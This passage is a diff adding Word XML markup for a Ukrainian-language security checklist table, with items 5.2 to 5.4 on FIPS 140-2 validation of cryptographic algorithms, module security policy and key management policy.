+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся, що криптографічні алгоритми, використовувані додатком були перевірені </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>зг</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ідно до</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>FIPS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>140-2 або екві</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>валентного</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> стандарту.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся в тому, що криптографічні модулі працюють</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>відповідно до опублікованої</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> політики </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>безпеки</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="916"/>
+                <w:tab w:val="left" w:pos="1832"/>
+                <w:tab w:val="left" w:pos="2748"/>
+                <w:tab w:val="left" w:pos="3664"/>
+                <w:tab w:val="left" w:pos="4580"/>
+                <w:tab w:val="left" w:pos="5496"/>
+                <w:tab w:val="left" w:pos="6412"/>
+                <w:tab w:val="left" w:pos="7328"/>
+                <w:tab w:val="left" w:pos="8244"/>
+                <w:tab w:val="left" w:pos="9160"/>
+                <w:tab w:val="left" w:pos="10076"/>
+                <w:tab w:val="left" w:pos="10992"/>
+                <w:tab w:val="left" w:pos="11908"/>
+                <w:tab w:val="left" w:pos="12824"/>
+                <w:tab w:val="left" w:pos="13740"/>
+                <w:tab w:val="left" w:pos="14656"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переко</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">найтеся, що існує явна політика </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>того, як криптографічні ключі управляються (наприклад, згенерован</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>і</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, розподілені, анульовані). </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
